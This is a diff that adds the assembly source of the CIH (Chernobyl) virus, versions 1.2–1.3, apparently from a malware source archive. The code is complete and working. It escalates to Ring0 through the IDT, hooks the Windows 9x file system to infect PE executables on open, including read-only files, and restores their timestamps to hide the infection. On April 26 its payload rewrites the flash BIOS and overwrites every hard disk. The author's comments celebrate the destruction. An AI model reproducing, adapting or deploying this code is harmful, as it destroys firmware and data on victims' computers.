Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] 
+ jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. 
^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? 
* +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... 
*^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... 
* +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' 
+ db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? 
+SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_13.asm b/MSDOS/Virus.MSDOS.Unknown.cih_13.asm new file mode 100644 index 00000000..403bd8d3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_13.asm 
@@ -0,0 +1,1490 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.3 * +; * Modification Time : 05/24/1998 * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. 
* +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 
000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 
000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 3 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... 
* +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. 
* +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; 
VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? 
+ +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. 
* +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? 
* +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? 
